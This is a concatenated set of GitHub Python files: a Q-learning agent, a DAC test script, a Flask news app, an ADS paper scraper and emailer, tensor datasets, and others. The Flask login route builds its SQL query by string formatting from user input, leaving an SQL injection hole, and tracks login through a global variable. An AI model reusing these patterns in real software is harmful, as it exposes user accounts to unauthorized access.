alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n","repo_name":"a4shubert/statslib","sub_path":"statslib/_lib/stat_tests.py","file_name":"stat_tests.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6980130649","text":"# Agent that uses a Q-Lookup Table (Specific form of Q-Learning) to approximate it's value function\nimport numpy as np\n\nfrom reinforcement_learning.r_agent import RAgent\n\n\nclass QAgent(RAgent):\n def __init__(self, env, eps=1.00, discount_rate=0.99, learning_rate=0.01):\n super().__init__(env)\n self.eps = eps\n self.discount_rate = discount_rate\n self.learning_rate = learning_rate\n self.plot = None\n self.total_rewards = None\n # self.build_table()\n\n # This assumes a discrete action and observation state\n # def build_table(self):\n # self.q_table = 1e-4 * np.random.random([self.observation_size, self.action_size])\n\n def get_action(self, state):\n if np.random.uniform() < self.eps:\n return super().get_action(state)\n else:\n # Greedy Choice\n action_values = self.q_table[state]\n action = np.argmax(action_values)\n return action\n\n def train(self, experience):\n state, next_state, reward, action, done = experience\n q_next = self.q_table[next_state]\n q_next = np.zeros([self.action_size]) if done or state == next_state else q_next\n q_target = reward + self.discount_rate * np.max(q_next)\n\n # Loss Fn\n q_update = q_target - self.q_table[state, action]\n\n # Update the table with a learning rate\n self.q_table[state, action] += self.learning_rate * q_update\n\n if done:\n self.eps *= 0.99\n\n def set_for_train(self, power=0, operand=10, epsilon=None):\n if epsilon != None:\n self.eps = epsilon\n change = operand ** (-1 * power)\n self.learning_rate *= change","repo_name":"brandonywl/MDP_Algo","sub_path":"reinforcement_learning/q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6216049781","text":"import rpimcp4822 as mcp\nimport time\n\ndev1 = mcp.RPiMCP4822(max_speed_khz=1000)\ndev1.setup_output_latch()\nprint(\"writing A to .4mV but not latching...\")\ndev1.write(400, 0)\ntime.sleep(2)\nprint(\"now writing .9V to B but still not latching\")\ndev1.write(900,1)\ntime.sleep(2)\nprint(\"writing 1.1V, waiting 2s to latch...\")\ndev1.write(1100,0)\ntime.sleep(1)\nprint(\"...1s...\")\ntime.sleep(1)\nprint(\"latching 1.1V, immediately writing .5V but not latching, waiting 4s...\")\ndev1.update_output()\ndev1.write(500, 0) # write channel A lower, but won't show up yet\ntime.sleep(2)\nprint(\"...2s...\")\ntime.sleep(2)\nprint(\"updating output to .5V, immediately writing 1200mV, then waiting 2s but never latching...\")\ndev1.update_output()\ndev1.write(1200, 0) # write 400mV to channel A\ntime.sleep(1)\nprint(\"...1s...\")\ntime.sleep(1)\n\ndev1.shutdown()\nprint(\"complete\")","repo_name":"mikewillems/rpimcp4822","sub_path":"rpimcp4822test.py","file_name":"rpimcp4822test.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39432828824","text":"from flask import render_template, redirect, url_for, flash\nfrom application import app\nfrom application import mysql\nimport MySQLdb\nimport MySQLdb.cursors\nfrom application.forms import RegisterForm, LoginForm\nimport socket\nimport json\nimport random\n\n# Import modules for API Access\nimport http.client, urllib.parse\n\n# Load API Key\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nAPI_KEY = os.getenv('API_KEY')\n\n# Create dictionary to store session information\n\n# DEFINE SQL STATEMENTS\nCREATE_USER = \"\"\"\nINSERT INTO user\n(username, email_address, password)\nVALUES (%s, %s, SHA1(%s))\n\"\"\"\n\n@app.route('/')\n@app.route('/home')\ndef home_page():\n return render_template('home.html')\n\n\n@app.route(\"/news\")\ndef news_page():\n try:\n # Validate user session\n if not loggedin:\n return render_template('home.html')\n except NameError:\n return render_template('home.html')\n\n # Connect to Mediastack API\n conn = http.client.HTTPConnection('api.mediastack.com')\n params = urllib.parse.urlencode({\n 'access_key': API_KEY,\n 'categories': 'general,science,sports,health,technology,entertainment',\n 'countries': 'ng,us,gb',\n 'languages': 'en',\n 'limit': 100\n })\n try:\n conn.request('GET', '/v1/news?{}'.format(params))\n except socket.gaierror:\n return '

Connection Timeout

'\n res = conn.getresponse()\n json_object = res.read()\n\n # Convert json response from api to python object\n python_object = json.loads(json_object)\n data = python_object['data']\n\n # Use random image from list \n images = [\n \"https://motionarray.imgix.net/preview-328095-gNWCObG9we-high_0004.jpg?w=660&q=60&fit=max&auto=format\",\n \"https://i.ytimg.com/vi/hBOUjUEY46w/hqdefault.jpg \",\n \"https://d1csarkz8obe9u.cloudfront.net/posterpreviews/breaking-news-poster-design-template-232c3f2700b91a0fd6e3a5a2e583a5da_screen.jpg?ts=1610645412\",\n \"https://media.istockphoto.com/vectors/breaking-news-live-banner-on-dotted-map-of-the-world-background-vector-id1150517899?k=20&m=1150517899&s=612x612&w=0&h=jMz9KZVY_abyiXfjdYfDMw0pUD2iTdNRnFBcHJgsxoI=\",\n \"https://cdn2.vectorstock.com/i/1000x1000/31/26/breaking-news-logo-icon-for-news-entertaining-vector-28933126.jpg\",\n \"https://i.pinimg.com/originals/24/39/a6/2439a657128437d7b308e112f05c2b70.png\",\n \"https://archive.org/download/news-logo/news-logo.png\",\n \"https://e7.pngegg.com/pngimages/155/416/png-clipart-record-news-logo-identidade-visual-connected-idea-logo-miscellaneous-television.png\",\n \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRPIs696h2cnMnWZudUbFg5xrhGxzKMJtJFXA&usqp=CAU\",\n \"https://www.presentation-3d.com/image/maker3d/demos/3dlogo120601.png\",\n \"https://cdn1.vectorstock.com/i/1000x1000/01/45/world-news-logo-flat-style-vector-20910145.jpg\",\n \"https://www.vinsighte.com.ng/img/partners-img/world-news.jpg\",\n \"https://image.shutterstock.com/image-photo/image-260nw-1080857420.jpg\"\n ]\n\n items = []\n\n for news in data:\n item = {\n 'title': news['title'],\n 'description': news['description'],\n 'url': news['url'],\n 'image': news['image'],\n 'backup_image': random.choice(images)\n }\n items.append(item)\n\n return render_template('news_page.html', items=items)\n\n\n@app.route(\"/\")\n@app.route(\"/customize\")\ndef customization_page():\n # Validate user session\n try:\n if not loggedin:\n return render_template('home.html')\n except NameError:\n return render_template('home.html')\n\n # Parameters to be accepted from user and fed to the API\n countries = ['Australia', 'Canada', 'China', 'France', 'Germany', 'India', 'Italy', 'Nigeria', 'Poland', 'Singapore', 'United States', 'United Kingdom']\n languages = ['Chinese', 'Dutch', 'English', 'French', 'German', 'Hebrew', 'Italian', 'Norweighian', 'Portuguese', 'Russian', 'Spanish', 'Swedish']\n categories = ['General', 'Business', 'Celebrity Gossip', 'Entertainment', 'Finance', 'Health', 'IT', 'Medicine & Pharmacy', 'Politics', 'Technology', 'Science', 'Sports']\n items = [\n {'country': countries[0], 'language': languages[0], 'category': categories[0]},\n {'country': countries[1], 'language': languages[1], 'category': categories[1]},\n {'country': countries[2], 'language': languages[2], 'category': categories[2]},\n {'country': countries[3], 'language': languages[3], 'category': categories[3]},\n {'country': countries[4], 'language': languages[4], 'category': categories[4]},\n {'country': countries[5], 'language': languages[5], 'category': categories[5]},\n {'country': countries[6], 'language': languages[6], 'category': categories[6]},\n {'country': countries[7], 'language': languages[7], 'category': categories[7]},\n {'country': countries[8], 'language': languages[8], 'category': categories[8]},\n {'country': countries[9], 'language': languages[9], 'category': categories[9]},\n {'country': countries[10], 'language': languages[10], 'category': categories[10]},\n {'country': countries[11], 'language': languages[11], 'category': categories[11]},\n ]\n\n return render_template('customize_page.html', items=items)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register_page():\n form = RegisterForm()\n\n if form.validate_on_submit():\n username = form.username.data\n email_address = form.email_address.data\n password1 = form.password1.data\n cursor = mysql.connection.cursor()\n\n # MYSQL Operational Errors\n try:\n cursor.execute(CREATE_USER, (username, email_address, password1))\n except MySQLdb.OperationalError:\n return '''\n
\n

Connection Time out

\n
\n
\n

Return To Previous Page

\n '''\n\n # Save to database\n mysql.connection.commit()\n\n # Close cursor\n cursor.close()\n\n # Create session information\n global loggedin\n loggedin = True\n\n return news_page()\n\n # Flash Error messages\n if form.errors != {}:\n for err_msg in form.errors.values():\n flash(f'{err_msg[0]}')\n\n return render_template('register.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login_page():\n form = LoginForm()\n if form.validate_on_submit():\n username = form.username.data\n password = form.password.data\n\n # Execute SQL Query to validate details\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(f\"SELECT * FROM user WHERE username = '{username}' AND password = SHA1('{password}')\")\n account = cursor.fetchone()\n\n if account:\n flash(f'Success! You are logged in as {username}', category='success')\n \n # Store session information\n global loggedin\n loggedin = True\n \n return news_page()\n else:\n flash('Username or Password incorrect. Please try again.', category='danger')\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n global loggedin\n loggedin = False\n return render_template('home.html')\n","repo_name":"Kelvinskell/terra-tier","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"2"} +{"seq_id":"1280206350","text":"from gym_curve.envs.curve_env import CurveEnv\nimport numpy as np\nenv = CurveEnv()\n\nobs = env.reset()\nfor i in range(1500):\n\n env.render()\n # action = np.random.choice(env._possible_moves())\n action = \"left\"\n\n obs, rewards, done, info = env.step(action)\n\n #print(i, obs, action, info)\n #print(info)\n if done:\n print(\"DONE\")\n obs = env.reset()\n\n","repo_name":"awieczork/Curve-Fever","sub_path":"CurveFeverGame.py","file_name":"CurveFeverGame.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"40670667296","text":"from itertools import combinations\n\ndef solution(relations):\n columns = [[] for _ in range(len(relations[0]))]\n for relation in relations:\n for i in range(len(relation)):\n columns[i].append(relation[i])\n \n minimality = set(i for i in range(len(columns)) if len(columns[i]) == len(set(columns[i])))\n second_mini = set()\n if len(columns) == 1:\n return len(minimality)\n # print(minimality) \n \n for i in range(2, len(columns) + 1):\n for combination in combinations([j for j in range(len(columns))], i):\n # 만일 존재한다면 유일성이 깨지므로 패스\n \n if minimality.intersection(combination):\n continue\n # print(combination)\n select_set = set(tuple(columns[j][i] for j in combination) for i in range(len(columns[0])))\n # print(select_set)\n if len(select_set) == len(columns[0]):\n second_mini.add(combination)\n \n # print(minimality, second_mini)\n mini_list = list(second_mini)\n sub_mini = set()\n for i in range(0, len(mini_list) - 1):\n for j in range(i + 1, len(mini_list)):\n # print(mini_list[i], mini_list[j])\n a = set(mini_list[i])\n b = set(mini_list[j])\n # print(a, b)\n if a.issubset(b):\n sub_mini.add(mini_list[j])\n xx = second_mini.difference(sub_mini)\n return len(minimality) + len(xx)\n\n\nrelations = [[\"100\",\"ryan\",\"music\",\"2\"],[\"200\",\"apeach\",\"math\",\"2\"],[\"300\",\"tube\",\"computer\",\"3\"],[\"400\",\"con\",\"computer\",\"4\"],[\"500\",\"muzi\",\"music\",\"3\"],[\"600\",\"apeach\",\"music\",\"2\"]]\nprint(solution(relations))","repo_name":"REXIANN/AlgorithmSolving","sub_path":"programmers/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"34437770338","text":"\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\n\n\n\nclass TensorDataset(Dataset):\n\n def __init__(self, sparseTensor):\n self.sparseTensor = sparseTensor\n self.tIdx, self.rIdx, self.cIdx = self.sparseTensor.nonzero()\n\n def __len__(self):\n return len(self.tIdx)\n\n def __getitem__(self, id):\n tIdx = self.tIdx[id]\n rIdx = self.rIdx[id]\n cIdx = self.cIdx[id]\n mVal = self.sparseTensor[tIdx, rIdx, cIdx]\n return tIdx, rIdx, cIdx, mVal\n\n\nclass SequentialDataset:\n\n def __init__(self, dense, windows, density):\n\n self.dense = dense\n quantile = np.percentile(self.dense, q=99)\n self.dense[self.dense > quantile] = quantile\n self.dense /= quantile\n self.start = -windows\n self.windows = windows\n self.density = density\n self.mask = np.random.rand(*dense.shape).astype('float32')\n self.mask[self.mask > self.density] = 1\n self.mask[self.mask < self.density] = 0\n\n def move_next(self):\n self.start += self.windows\n return self.start < self.dense.shape[0]\n\n def reset(self):\n self.start = -self.windows\n\n def get_loaders(self):\n curr_tensor = self.dense[self.start:self.start + self.windows]\n curr_mask = self.mask[self.start:self.start + self.windows]\n trainTensor = curr_tensor * (1 - curr_mask)\n testTensor = curr_tensor * curr_mask\n trainset = TensorDataset(trainTensor)\n testset = TensorDataset(testTensor)\n trainLoader = DataLoader(trainset, batch_size=128, shuffle=True)\n testLoader = DataLoader(testset, batch_size=1024)\n return trainLoader, testLoader\n\n\nclass SequentialFutureDataset:\n\n def __init__(self, dense, windows, density):\n\n self.dense = dense\n quantile = np.percentile(self.dense, q=99)\n self.dense[self.dense > quantile] = quantile\n self.dense /= quantile\n self.start = -windows\n self.windows = windows\n self.density = density\n self.mask = np.random.rand(*dense.shape).astype('float32')\n self.mask[self.mask > self.density] = 1\n self.mask[self.mask < self.density] = 0\n\n def move_next(self):\n self.start += self.windows\n return self.start < self.dense.shape[0]\n\n def reset(self):\n self.start = -self.windows\n\n def get_loaders(self):\n curr_tensor = self.dense[self.start:self.start + self.windows]\n curr_mask = self.mask[self.start:self.start + self.windows]\n currTrain = curr_tensor * (1 - curr_mask)\n currTest = curr_tensor * curr_mask\n trainset = TensorDataset(currTrain)\n testset = TensorDataset(currTest)\n curr_trainLoader = DataLoader(trainset, batch_size=128, shuffle=True, drop_last=True)\n curr_testLoader = DataLoader(testset, batch_size=1024)\n\n if self.start + 2 * self.windows < self.dense.shape[0]:\n future_tensor = self.dense[self.start + self.windows: self.start + 2 * self.windows]\n future_mask = self.mask[self.start + self.windows: self.start + 2 * self.windows]\n futureTrain = future_tensor * (1 - future_mask)\n futureset = TensorDataset(futureTrain)\n future_trainLoader = DataLoader(futureset, batch_size=128, shuffle=True, drop_last=True)\n return curr_trainLoader, curr_testLoader, future_trainLoader\n\n return curr_trainLoader, curr_testLoader, None\n\n\n\n\n","repo_name":"MerrillLi/LightNestle","sub_path":"module/SeqDataset.py","file_name":"SeqDataset.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"30751840876","text":"# Paperboy written by Andy Casey, acasey@mso.anu.edu.au\n# http://astrowizici.st\n\n# Change these for a given institute\nHOST = \"mso.anu.edu.au\"\nFROM_ADDRESS = \"Paperboy\"\nADMIN_ADDRESS = \"acasey@mso.anu.edu.au\"\nINSTITUTE_QUERY = [\n \"*mount stromlo observatory*\", # or\n \"*research school of astronomy and astrophysics*\"\n]\n# Don't change anything past here unless you're a Python wizard.\n\nimport logging\nimport os\nimport re\nimport urllib2\nimport smtplib\nimport sys\nimport textwrap\nimport time\nimport traceback\n\nfrom calendar import monthrange\nfrom datetime import datetime\nfrom email import Encoders\nfrom email.MIMEBase import MIMEBase\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\nfrom email.Utils import formatdate\n\nfrom pyPdf import PdfFileReader, PdfFileWriter\n\nlogging.basicConfig(filename=os.path.join(os.path.dirname(__file__), datetime.now().strftime('%Y-%m-%d_%H:%M:%S.log')), filemode='w', level=logging.DEBUG)\n\n\ndef retrieve_article_urls(start_year, start_month, end_year, end_month, timeout=120):\n \"\"\"Retrieves the bibliography codes and URLS for all peer-reviewed articles\n published in the specified time frame from an institute.\n \n Inputs\n ----\n start_year : int\n Year to start searching from, e.g., 2012.\n \n start_month : int\n Month to start searching from between 1-12.\n \n end_year : int\n Year to stop searching from (inclusive).\n \n end_month : int\n Month to stop searching from between 1-12 (inclusive).\n \n timeout : int, optional\n Number of seconds to wait before timing out the socket connection\n \n Raises\n ----\n ValueError\n If the end date is before the start date, or the start date is in the\n future.\n \n Returns\n ----\n articles : list containing tuples of length 2\n Each tuple contains a bibliography code and the article URL.\n \"\"\"\n \n st = datetime(start_year, start_month, 1)\n et = datetime(end_year, end_month, monthrange(end_year, end_month)[1])\n \n if st > et:\n raise ValueError(\"End date specified is before the start date.\")\n \n if st > datetime.now():\n raise ValueError(\"We're astronomers not astrologers; we can't predict the future.\")\n \n \n logging.info(\"Looking for peer-reviewed articles on ADS published between %i/%i and %i/%i\" \\\n % (start_year, start_month, end_year, end_month, ))\n \n # Prepare the data for ADS \n affiliation = \"%0D%0A\".join(INSTITUTE_QUERY).replace(' ', '+') \n data = \"\"\"db_key=AST&db_key=PRE&qform=AST&arxiv_sel=astro-ph&arxiv_sel=cond-\n mat&arxiv_sel=cs&arxiv_sel=gr-qc&arxiv_sel=hep-ex&arxiv_sel=hep-lat&arxiv_se\n l=hep-ph&arxiv_sel=hep-th&arxiv_sel=math&arxiv_sel=math-ph&arxiv_sel=nlin&ar\n xiv_sel=nucl-ex&arxiv_sel=nucl-th&arxiv_sel=physics&arxiv_sel=quant-ph&arxiv\n _sel=q-bio&sim_query=YES&ned_query=YES&adsobj_query=YES&aut_logic=OR&obj_log\n ic=OR&author=&object=&start_mon=%i&start_year=%i&end_mon=%i&end_year=%i&ttl_\n logic=OR&title=&txt_logic=OR&text=&kwd_logic=OR&keyword=&aff_req=YES&aff_log\n ic=OR&affiliation=%s&nr_to_return=200&start_nr=1&jou_pick=NO&ref_stems=&data\n _and=ALL&group_and=ALL&start_entry_day=&start_entry_mon=&start_entry_year=&e\n nd_entry_day=&end_entry_mon=&end_entry_year=&min_score=&sort=SCORE&data_type\n =SHORT&aut_syn=YES&txt_syn=YES&txt_syn=YES&aut_wt=1.0&obj_wt=1.0&ttl_wt=0.3&\n txt_wt=3.0&aut_wgt=YES&obj_wgt=YES&ttl_wgt=YES&txt_wgt=YES&ttl_sco=YES&txt_s\n co=YES&version=1&aff_syn=NO&aff_wt=1.0&aff_wgt=YES&kwd_sco=YES&kwd_syn=NO&kw\n d_wt=1.0&kwd_wgt=YES&kwd_sco=YES\"\"\".replace('\\n ', '') \\\n % (start_month, start_year, end_month, end_year, affiliation, )\n \n host = 'http://adsabs.harvard.edu/cgi-bin/nph-abs_connect?' + data\n \n # Perform the query\n request = urllib2.Request(host)\n handle = urllib2.urlopen(request, timeout=timeout)\n data = ''.join(handle.read())\n \n # Search for pre-prints and article links\n \n preprints = re.findall('href=\"\\S+link_type=PREPRINT\"', data)\n articles = re.findall('href=\"\\S+link_type=ARTICLE\"', data)\n \n logging.info(\"Identified %i preprint links and %i article links.\" \\\n % (len(preprints), len(articles), ))\n \n if len(preprints) > len(articles):\n logging.info(\"Preprint links will be used wherever refereed article files are unavailable.\")\n \n # Clean up the links\n preprints = [preprint.split('\"')[1] for preprint in preprints]\n articles = [article.split('\"')[1] for article in articles]\n \n logging.debug(\"Pre-prints:\")\n [logging.debug(preprint) for preprint in preprints]\n \n logging.debug(\"Article links:\")\n [logging.debug(article) for article in articles]\n \n \n article_baselinks = [';'.join(article.split(';')[:-1]) for article in articles]\n \n article_urls = []\n \n # Check for any papers that have preprints but no full refereed journal article\n for preprint in preprints:\n link = ';'.join(preprint.split(';')[:-1])\n \n if link not in article_baselinks:\n # This particular paper had no full PDF link, so we will have to take\n # the pre-print\n article_urls.append(preprint)\n \n else:\n # This will maintain chronological order of all the articles\n article_urls.append(articles[article_baselinks.index(link)])\n \n # Clean up the links [TODO] make this more elegant\n article_urls = [article.replace('&', '&') for article in article_urls] \n \n # Extract bibcodes\n bibcodes = []\n for article in article_urls:\n bibcode = re.findall('(?<=bibcode=)\\S+(?=&db_key)', article)\n \n if len(bibcode) is 0:\n logging.warn(\"Could not find bibliography code from URL (%s).\" \\\n + \"Assigning random string instead.\" % (article, ))\n bibcode = ''\n else: bibcode = bibcode[0].replace('%26', '&') # TODO be more elegant\n \n bibcodes.append(bibcode)\n \n \n return zip(bibcodes, article_urls)\n \n\n\n\ndef download_article(article_url, output, clobber=True, timeout=120):\n \"\"\"Retrieves an article or pre-print PDF from ADS and saves it to disk.\n \n Inputs\n ----\n article_url : str\n The URL of the article to retrieve.\n \n output : str\n Output filename to save the article to.\n \n clobber : bool, optional\n Whether to overwrite the file if the filename already exists.\n \n timout : int, optional\n Amount of seconds to wait before timing out the socket connection.\n \n Raises\n ----\n ValueError\n If an article URL is not from NASA ADS.\n \n IOError\n If the filename provided exists but we've been told not to clobber it.\n \"\"\"\n\n if not article_url.startswith('http://adsabs.harvard.edu'):\n raise ValueError('Expected an article URL that from ADS, but the URL ' \\\n + 'did not start with http://adsabs.harvard.edu: \"%s\"' \\\n % (article_url, ))\n \n if os.path.exists(output) and not clobber:\n raise IOError('Filename exists (%s) and we will not clobber it.' \\\n % (article_url, ))\n \n logging.info(\"Attempting to download article from %s\" % (article_url, ))\n \n request = urllib2.Request(article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n \n if handle.geturl().startswith('http://arXiv.org/'):\n # This is a pre-print URL, so we actually need to rget the real PDF\n real_article_url = handle.geturl().replace('/abs/', '/pdf/')\n logging.info(\"This article is a preprint, so we are taking it from %s instead\" \\\n % (real_article_url, ))\n \n request = urllib2.Request(real_article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n elif handle.geturl().startswith('http://onlinelibrary.wiley.com'):\n # Wiley has this annoying frame that we need to navigate through.\n \n data = handle.read()\n \n real_article_url = re.findall('iframe id=\"pdfDocument\" src=\".+\" width=\"100%\"', data)[0].split('src=\"')[1].split('\" width=\"100%\"')[0]\n logging.info(\"This article is through Wiley which uses an internal frame to display PDF files, so we are following through to %s\" % (real_article_url, ))\n \n request = urllib2.Request(real_article_url)\n handle = urllib2.urlopen(request, timeout=timeout)\n \n data = handle.read()\n \n pdf_file = open(output, 'wb')\n pdf_file.write(data)\n pdf_file.close()\n \n logging.info(\"Article saved to %s\" % (output, ))\n \n return output\n\n\ndef summarise_articles(articles, output, clobber=True):\n \"\"\"Collects the first page from all the article filenames provided and puts\n them into a single PDF file.\n \n Inputs\n ----\n articles : list of str\n A list of PDF filenames to generate the summary file from.\n \n output : str\n Output filename for the summary file.\n \n clobber : bool, optional\n Whether to overwrite the output file if the filename already exists.\n \n Raises\n ----\n IOError\n If the output filename provided exists but we've been told not to clobber it.\n \"\"\"\n \n if os.path.exists(output) and not clobber:\n raise IOError(\"Output file name exists (%s) and we've been told not to clobber it.\" % (output, ))\n \n output_pdf = PdfFileWriter()\n \n article_fps = []\n for article in articles:\n # Open the article\n article_fp = open(article, \"rb\")\n article_pdf = PdfFileReader(article_fp)\n \n # Add the first page to our summary PDF\n output_pdf.addPage(article_pdf.getPage(0))\n article_fps.append(article_fp)\n \n # Save the final PDF\n output_fp = open(output, 'wb')\n output_pdf.write(output_fp)\n output_fp.close()\n \n [article_fp.close() for article_fp in article_fps]\n \n return True\n\n\ndef email_article_summary(to_address, summary_filename, start_year, start_month, end_year, end_month, num_articles):\n \"\"\"Emails a summary file to the given address, with brief information about\n the number of articles published institute authors in a given time period.\n \n Inputs\n ----\n to_address : str\n E-mail address to send the article summary to.\n \n summary_filename : str\n Filename where the output summary file is saved to.\n \n start_year : int\n Year to start searching for article from, e.g. 2012\n \n start_month : int\n Month to start searching for articles from, between 1-12.\n \n end_year : int\n Inclusive year to stop searching for articles from.\n \n end_month : int\n Inclusive month to stop searching for articles from.\n \n num_articles : int\n Number of articles found in the given month.\n \n Notes\n ----\n start_year, start_month, end_year, end_month, and num_articles are required\n for the email body because this information cannot be deduced from the\n summary_filename PDF.\n \n Raises\n ----\n Exception\n If there was some problem sending the email.\n \"\"\"\n \n host = HOST\n from_address = FROM_ADDRESS\n body = \"\"\"\n Good morning,\n \n There were %i peer-reviewed papers produced by researchers at this institute between %i/%i and %i/%i. A summary file containing the front page from each article is attached with this email. Please print out these summary pages, highlight the author(s) on each article and pin them to the monthly papers noticeboard.\n \n Thanks a bunch,\n \n Skynet.\n \n \"\"\" % (num_articles, start_month, start_year, end_month, end_year, )\n \n recipients = [to_address, ADMIN_ADDRESS]\n \n logging.info(\"Preparing summary email report for %s\" % (', '.join(recipients), ))\n \n successful = True\n for recipient in recipients:\n \n message = MIMEMultipart()\n message[\"From\"] = from_address\n message[\"To\"] = recipient\n message[\"Subject\"] = \"Refereed papers summary between %i/%i and %i/%i\" % (start_month, start_year, end_month, end_year, )\n message[\"Date\"] = formatdate(localtime=True)\n \n message.attach(MIMEText(textwrap.dedent(body).lstrip()))\n \n part = MIMEBase('application', 'octet-stream')\n part.set_payload(open(summary_filename, 'rb').read())\n Encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(summary_filename))\n message.attach(part)\n \n server = smtplib.SMTP(host)\n \n try:\n failed = server.sendmail(from_address, to_address, message.as_string())\n server.close()\n \n except Exception as e:\n logging.critical(\"Unable to send email to %s. Error: %s\" % (recipient, str(e), ))\n successful = False\n \n else:\n logging.info(\"Email successfully sent to %s\" % recipient)\n \n \n return successful\n \n\ndef report_monthly_papers(email_address, start_year, start_month, end_year, end_month, timeout):\n \"\"\"Retrieves all peer-reviewed papers authored or co-authored by researchers\n at a given institute in a given time frame, and emails a paperboy/girl the\n first page of each peer-reviewed article.\n \n Inputs\n ----\n email_address : str\n E-mail to send the montly report to.\n \n start_year : int\n Year to start searching for articles from.\n \n start_month : int\n Month to start searching for articles from, e.g. 1-12\n \n end_year : int\n Inclusive month to stop searching for articles from.\n \n end_month : int\n Inclusive month to stop searching for articles from.\n \n timeout : int\n Number of seconds to wait before timing out the article retrival socket.\n \n Returns\n ----\n None\n \"\"\"\n \n start_year = int(start_year)\n start_month = int(start_month)\n \n if end_year is None:\n end_year = start_year if 12 > start_month else start_year + 1\n else:\n end_year = int(end_year)\n \n if end_month is None:\n end_month = start_month + 1 if 12 > start_month else 1\n else:\n end_month = int(end_month)\n \n folder = os.path.join(os.path.dirname(__file__), '%s-%s_%s-%s' \\\n % (start_year, start_month, end_year, end_month, ))\n if not os.path.exists(folder):\n os.system('mkdir %s' % (folder, )) \n \n article_list = retrieve_article_urls(start_year, start_month, end_year=end_year, end_month=end_month, timeout=timeout)\n saved_articles = [download_article(article, '%s/%s.pdf' % (folder, bibcode, )) for bibcode, article in article_list]\n summarise_articles(saved_articles, '%s/summary.pdf' % (folder, ))\n\n email_article_summary(email_address, '%s/summary.pdf' % (folder, ), start_year, start_month, end_year, end_month, len(article_list))\n\n\n\nif __name__ == '__main__':\n \n import argparse\n \n class LastMonthAction(argparse.Action):\n def __init__(self,\n option_strings,\n dest,\n nargs=None,\n const=None,\n default=None,\n type=None,\n choices=None,\n required=False,\n help=None,\n metavar=None):\n argparse.Action.__init__(self,\n option_strings=option_strings,\n dest=dest,\n nargs=nargs,\n const=const,\n default=default,\n type=type,\n choices=choices,\n required=required,\n help=help,\n metavar=metavar,\n )\n return\n \n def __call__(self, parser, namespace, values, option_string=None):\n \n if values == \"last\":\n now = datetime.now()\n month = now.month - 1\n year = now.year if now.month != 12 else now.year - 1\n \n setattr(namespace, 'end_month', month)\n setattr(namespace, 'end_year', year)\n \n elif values == \"this\":\n now = datetime.now()\n month, year = now.month, now.year\n \n \n setattr(namespace, self.dest, month)\n setattr(namespace, 'start_year', year)\n \n \n \n \n parser = argparse.ArgumentParser(prog=\"python paperboy.py\", description=\"Retrieves recent peer-reviewed articles published by institute staff and emails a summary report.\\n\\nExample: python paperboy.py --to my@email.com --month last\")\n \n #paperboy --month= --year= --to\n #month can be last, and then year is not necessary\n # end_year, end_month availabile\n \n parser.add_argument('--month', action=LastMonthAction, dest='start_month')\n parser.add_argument('--year', action='store', dest='start_year', type=int)\n \n parser.add_argument('--to', action='store', dest='to_address', type=str, default=None)\n parser.add_argument('--end_month', action='store', dest='end_month', type=int, default=None)\n parser.add_argument('--end_year', action='store', dest='end_year', type=int, default=None)\n parser.add_argument('--timeout', action='store', dest='timeout', type=int, default=120)\n parser.add_argument('--repeats', action='store', dest='repeats', type=int, default=3)\n parser.add_argument('--interval', action='store', dest='interval', type=int, default=120)\n \n results = parser.parse_args()\n \n if None not in [results.to_address, results.start_year, results.start_month]:\n \n for attempt in xrange(results.repeats):\n \n try:\n report_monthly_papers(results.to_address, results.start_year, results.start_month, results.end_year, results.end_month, results.timeout)\n \n except:\n etype, value, tb = sys.exc_info()\n logging.critical(\"An error occurred whilst trying to report the monthly papers:\\n\\tTraceback (most recent call last):\\n%s\\n\\t%s: %s\" \n % (\"\\n\".join(traceback.format_tb(tb, 5)), etype, value))\n logging.info(\"We will try again in %i seconds (%i attempts remaining).\" % (results.interval, results.repeats - attempt - 1, ))\n time.sleep(results.interval)\n \n else:\n logging.info(\"Finished successfully.\")\n break\n \n \n \n \n","repo_name":"andycasey/paperboy","sub_path":"paperboy.py","file_name":"paperboy.py","file_ext":"py","file_size_in_byte":19127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32957401474","text":"#!/usr/bin/env python3\n\"\"\"Guess word pronunciations using a Phonetisaurus FST\n\nSee bin/fst2npz.py to convert an FST to a numpy graph.\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\nimport typing\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\n\n_LOGGER = logging.getLogger(\"g2p_phonetisaurus\")\n\nNUMPY_GRAPH = typing.Dict[str, np.ndarray]\n\n# -----------------------------------------------------------------------------\n\n\ndef main():\n \"\"\"Main entry point\"\"\"\n parser = 